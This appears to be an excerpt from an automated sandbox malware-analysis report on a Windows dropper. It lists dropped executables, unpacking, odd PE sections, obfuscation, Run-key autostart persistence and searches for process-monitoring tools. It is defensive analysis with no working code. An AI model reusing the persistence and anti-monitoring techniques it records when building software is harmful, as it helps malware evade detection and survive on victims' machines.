Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2989568 > 1048576
Source: file.exe Static PE information: Raw size of fedkisnw is bigger than: 0x100000 < 0x2b0800
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000003.2338491843.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000002.2471724007.0000000000C52000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Unpacked PE file: 3.2.0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.d10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Unpacked PE file: 7.2.A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W;fekqellx:EW;rtvnkudg:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Unpacked PE file: 12.2.353ab0ae6e.exe.f60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Unpacked PE file: 16.2.09d417a7c4.exe.c30000.0.unpack :EW;.rsrc :W;.idata :W;fedkisnw:EW;adtbrenv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;fedkisnw:EW;adtbrenv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Unpacked PE file: 32.2.353ab0ae6e.exe.f60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Unpacked PE file: 33.2.RETV5V6Q4X285DV6.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpbwynir:EW;gxdcsuck:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Unpacked PE file: 37.2.SOZIL3CYM3GR68KV3Z4.exe.770000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: random[1].exe.10.dr Static PE information: real checksum: 0x2e20f2 should be: 0x2df8a4
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: real checksum: 0x2abcb8 should be: 0x2b2619
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: real checksum: 0x1dc5b6 should be: 0x1e46b6
Source: random[1].exe0.10.dr Static PE information: real checksum: 0x1c8855 should be: 0x1d2705
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: real checksum: 0x1c8855 should be: 0x1d2705
Source: 09d417a7c4.exe.10.dr Static PE information: real checksum: 0x2e20f2 should be: 0x2df8a4
Source: 353ab0ae6e.exe.10.dr Static PE information: real checksum: 0x1c8855 should be: 0x1d2705
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: real checksum: 0x1dc5b6 should be: 0x1e46b6
Source: file.exe Static PE information: real checksum: 0x2e20f2 should be: 0x2df8a4
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1dc5b6 should be: 0x1e46b6
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: real checksum: 0x1c8855 should be: 0x1d2705
Source: num[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: real checksum: 0x2abcb8 should be: 0x2b2619
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: fedkisnw
Source: file.exe Static PE information: section name: adtbrenv
Source: file.exe Static PE information: section name: .taggant
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name:
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: .idata
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: fekqellx
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: rtvnkudg
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: .taggant
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name:
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: .idata
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name:
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: dpbwynir
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: gxdcsuck
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: .taggant
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name:
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: .rsrc
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: .idata
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name:
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: ffngccge
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: atmmyeyl
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: dpbwynir
Source: skotes.exe.3.dr Static PE information: section name: gxdcsuck
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name: .rsrc
Source: random[1].exe.10.dr Static PE information: section name: .idata
Source: random[1].exe.10.dr Static PE information: section name: fedkisnw
Source: random[1].exe.10.dr Static PE information: section name: adtbrenv
Source: random[1].exe.10.dr Static PE information: section name: .taggant
Source: 09d417a7c4.exe.10.dr Static PE information: section name:
Source: 09d417a7c4.exe.10.dr Static PE information: section name: .rsrc
Source: 09d417a7c4.exe.10.dr Static PE information: section name: .idata
Source: 09d417a7c4.exe.10.dr Static PE information: section name: fedkisnw
Source: 09d417a7c4.exe.10.dr Static PE information: section name: adtbrenv
Source: 09d417a7c4.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .rsrc
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: ffngccge
Source: random[1].exe0.10.dr Static PE information: section name: atmmyeyl
Source: random[1].exe0.10.dr Static PE information: section name: .taggant
Source: 353ab0ae6e.exe.10.dr Static PE information: section name:
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: .rsrc
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: .idata
Source: 353ab0ae6e.exe.10.dr Static PE information: section name:
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: ffngccge
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: atmmyeyl
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: .taggant
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name:
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: .idata
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name:
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: dpbwynir
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: gxdcsuck
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: .taggant
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name:
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: .rsrc
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: .idata
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name:
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: ffngccge
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: atmmyeyl
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: .taggant
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name:
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: .idata
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: fekqellx
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: rtvnkudg
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3139B pushfd ; iretd 0_3_00D3139E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3139B pushfd ; iretd 0_3_00D3139E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3139B pushfd ; iretd 0_3_00D3139E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31458 push esi; retf 0_3_00D31459
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31458 push esi; retf 0_3_00D31459
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31458 push esi; retf 0_3_00D31459
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31374 pushfd ; iretd 0_3_00D3138E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31374 pushfd ; iretd 0_3_00D3138E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D31374 pushfd ; iretd 0_3_00D3138E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2DF10 pushfd ; iretd 0_3_00D2DF2D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2DF10 pushfd ; iretd 0_3_00D2DF2D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2DF10 pushfd ; iretd 0_3_00D2DF2D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3101C push edx; iretd 0_3_00D3101D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3101C push edx; iretd 0_3_00D3101D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3101C push edx; iretd 0_3_00D3101D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2C32F push cs; iretd 0_3_00D2C330
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2C32F push cs; iretd 0_3_00D2C330
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2C32F push cs; iretd 0_3_00D2C330
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D2EADC push FFFFFF90h; iretd 0_3_00D2EADE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D315E4 push FFFFFF90h; iretd 0_3_00D315E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D3139B pushfd ; iretd 0_3_00D3139E
Source: file.exe Static PE information: section name: entropy: 7.963555692387449
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe.0.dr Static PE information: section name: entropy: 7.775203790844339
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: entropy: 7.987069524478379
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.0.dr Static PE information: section name: dpbwynir entropy: 7.9542547336729115
Source: RLX7QEJ1ATLQN8ECDIPHB.exe.0.dr Static PE information: section name: ffngccge entropy: 7.954195447661275
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.987069524478379
Source: skotes.exe.3.dr Static PE information: section name: dpbwynir entropy: 7.9542547336729115
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.963555692387449
Source: 09d417a7c4.exe.10.dr Static PE information: section name: entropy: 7.963555692387449
Source: random[1].exe0.10.dr Static PE information: section name: ffngccge entropy: 7.954195447661275
Source: 353ab0ae6e.exe.10.dr Static PE information: section name: ffngccge entropy: 7.954195447661275
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: entropy: 7.987069524478379
Source: RETV5V6Q4X285DV6.exe.11.dr Static PE information: section name: dpbwynir entropy: 7.9542547336729115
Source: SOZIL3CYM3GR68KV3Z4.exe.11.dr Static PE information: section name: ffngccge entropy: 7.954195447661275
Source: GKAQCOVK40X0NN7A.exe.11.dr Static PE information: section name: entropy: 7.775203790844339
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File created: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File created: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File created: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09d417a7c4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29af563a7b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 353ab0ae6e.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: PROCMON_WINDOW_CLASS
